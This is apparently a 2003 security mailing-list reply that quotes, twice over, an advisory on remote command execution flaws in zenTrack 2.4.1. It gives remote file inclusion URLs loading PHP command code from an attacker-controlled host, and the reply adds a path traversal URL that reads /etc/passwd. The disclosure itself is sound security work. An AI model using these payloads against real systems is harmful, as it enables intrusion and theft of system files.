www.zencracking.com.ar gr00vy Argentina!
On Thu, 2003-06-05 at 22:00, farking (at) i-ownur (dot) info [email concealed] wrote:
> Subject: zenTrack Remote Command Execution Vulnerabilities
> Author: farking (farking (at) i-ownur (dot) info [email concealed])
> Product: zenTrack 2.4.1 (latest) and below
> Vendor: http://zendocs.phpzen.net/zentrack /
> http://sourceforge.net/projects/zentrack/
> Status: Vendor contacted (27/05/2003)
> Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
> Greet to: corpsie & EvoIVGSR
>
> Description
> -----------
>
> zenTrack is a flexible system for tracking work, requests, information,
> and customer care.
> The goal of the project is to provide a method for organizing, managing,
> and archiving requests, work, and information
> in a structured and reliable method.
>
> Details
> -------
>
> zenTrack vulnerability exist in header.php that hold zenTrack
> configuration settings. Some code
>
> <?
> :
> $libDir = "/web/zentrack/includes";
> $rootUrl = "http://www.yourhost.com/zentrack";
> $Debug_Mode = 0;
> $Demo_Mode = "off";
> $configFile = "$libDir/configVars.php";
> :
> ?>
>
>
> This allow anyone to take advantage of this vulnerability and run remote
> command as webserver privilege. For example:
>
> http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
> cmd=pwd
>
> or
>
> Create translator.class anywhere in your website contain php code that
> allow you to run command. For this example I'll
> create translator.class in the test directory:
>
> http://[victim]/zentrack/www/index.php?libDir=http://
> [attacker]/test/&cmd=pwd
>
> If you dont wan't to see any error just copy translator.class as
> zenTrack.class :)
>
> Other vulnerability is attacker can turn zenTrack demo mode to on or set
> zenTrack debug mode that will show extra info.
>
>
> ------------------------------
> farking (farking (at) i-ownur (dot) info [email concealed])
> http://farking.daemon.sh
http://www.vulnerablehost.com.ar/zentrack/index.php?configFile=/../../..
/../../etc/passwd
You can recieve the file! :)
www.zencracking.com.ar gr00vy Argentina!
On Thu, 2003-06-05 at 22:00, farking (at) i-ownur (dot) info [email concealed] wrote:
> Subject: zenTrack Remote Command Execution Vulnerabilities
> Author: farking (farking (at) i-ownur (dot) info [email concealed])
> Product: zenTrack 2.4.1 (latest) and below
> Vendor: http://zendocs.phpzen.net/zentrack /
> http://sourceforge.net/projects/zentrack/
> Status: Vendor contacted (27/05/2003)
> Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
> Greet to: corpsie & EvoIVGSR
>
> Description
> -----------
>
> zenTrack is a flexible system for tracking work, requests, information,
> and customer care.
> The goal of the project is to provide a method for organizing, managing,
> and archiving requests, work, and information
> in a structured and reliable method.
>
> Details
> -------
>
> zenTrack vulnerability exist in header.php that hold zenTrack
> configuration settings. Some code
>
> <?
> :
> $libDir = "/web/zentrack/includes";
> $rootUrl = "http://www.yourhost.com/zentrack";
> $Debug_Mode = 0;
> $Demo_Mode = "off";
> $configFile = "$libDir/configVars.php";
> :
> ?>
>
>
> This allow anyone to take advantage of this vulnerability and run remote
> command as webserver privilege. For example:
>
> http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
> cmd=pwd
>
> or
>
> Create translator.class anywhere in your website contain php code that
> allow you to run command. For this example I'll
> create translator.class in the test directory:
>
> http://[victim]/zentrack/www/index.php?libDir=http://
> [attacker]/test/&cmd=pwd
>
> If you dont wan't to see any error just copy translator.class as
> zenTrack.class :)
>
> Other vulnerability is attacker can turn zenTrack demo mode to on or set
> zenTrack debug mode that will show extra info.
>
>
> ------------------------------
> farking (farking (at) i-ownur (dot) info [email concealed])
> http://farking.daemon.sh
[ reply ]